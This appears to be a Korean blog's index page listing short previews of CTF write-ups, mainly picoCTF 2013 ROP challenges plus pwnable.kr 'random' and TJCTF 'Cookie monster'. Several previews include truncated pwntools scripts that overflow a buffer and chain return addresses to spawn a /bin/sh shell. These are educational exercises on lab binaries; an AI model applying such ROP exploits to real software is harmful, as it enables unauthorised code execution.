분류 전체보기(603)
-
pwnable.kr - random
pwn.kr random문제입니다.소스코드를 보면 random값하고 제가 넣은 input하고 xor연산을 통해서 deadbeef와 같으면 flag를 줍니다. 그럼 random값만 알게된다면 쉽게 풀 수 있습니다.random값을 알기위해서 ltrace명령어를 사용합니다. python으로 xor연산을 하면? 그대로 입력하면?(grin)
2018.08.16 -
[pico CTF 2013] rop4
PICO rop4번 마지막문제입니다! ㅎㅎ 이번문제는 소스코드가없으면 풀기 어려워서 소스코드도 같이 첨부하겠습니다. 123456789101112131415161718192021222324252627282930313233343536373839#include #include #include char exec_string[20]; void exec_the_string() { execlp(exec_string, exec_string, NULL);} void call_me_with_cafebabe(int cafebabe) { if (cafebabe == 0xcafebabe) { strcpy(exec_string, "/sh"); }} void call_me_with_two_args(int deadbeef, int ..
2018.08.16 -
[pico CTF 2013] rop3
pico CTF Rop3번문제 (grin) 취약점 분석! 똑..같다 ㅎ하지만 이번에는 shell을 직접 띄어줘야한다 ㅠㅠ 저번에푼rop공룡같이 풀어본다!! 123456789101112131415161718192021222324252627282930313233from pwn import * r = process("./rop3") payload = ""read_plt = 0x08048360read_got = 0x0804a000write_plt = 0x080483a0shell = "/bin/sh"bss = 0x0804a020offset = 0x9ad60pppr = 0x804855d payload += "A"*140payload += p32(read_plt) + p32(pppr) + p32(0) + p32(bs..
2018.08.16 -
[pico CTF 2013] rop2
pico CTF 2013 ROP2번문제입니다.보호기법 체크하기! IDA로 까서 취약점을 찾아보겠습니다. 이전문제하고 똑같은 취약점이군요 ㅎㅎ쉽게 풀릴 것 같아서 not_called함수로 들어가보겠습니다. 어라... "/bin/bash"가 아니라 "/bin/data"로 바뀌어있네요.당황 ㅋㅋㅋㅋ조금더 살펴보니 system함수를 내부에서 호출하니, system함수로 ret를 주고, 인자로 "/bin/sh"를 주면 될 것 같습니다. system주소 찾고, "/bin/bash"가젯 찾고, payload 작성하면? 1234567891011121314151617181920from pwn import * r = process("./rop2")system_plt = 0x80483a0shell = 0x08048610 p..
2018.08.16 -
[TJCTF2018] - Cookie monster
이번에는 10점짜리 문제이다 :) 처음에 들어가보면 새로운 사이트에서 말그림이 하나 나온다.스크롤을 쭉 내리니 다리가 계속 생긴다. 이건 소스코드에 무건가가 있다 생각하고 보았지만.. 다음과 같이 아무것도 없다.문뜩 떠오른 생각에 문제 이름이 cookie였다. 그래서 확인해보았다. 어라...이런문제구나 :)(grin)
2018.08.16 -
[pico CTF 2013] rop1
pico ctf rop1번 문제입니다. checksec 하고! 바이너리까보면 취약한 함수라고 손수 알려주는군요 ㅎㅎ88만큼받는데 무려..100을 ㅎㅎ BOF 어떻게 rop를 만들까 생각해보니까 마침 부르지말라는 곳에 shell호출하는 함수가 있네요! :) 그냥 exploit하죠!! 12345678910111213141516171819from pwn import * r = process("./pico_rop1")system = 0x080484A4 payload = "" payload += "A"*140payload += p32(system) r.send(payload)r.interactive() cs (grin)
2018.08.15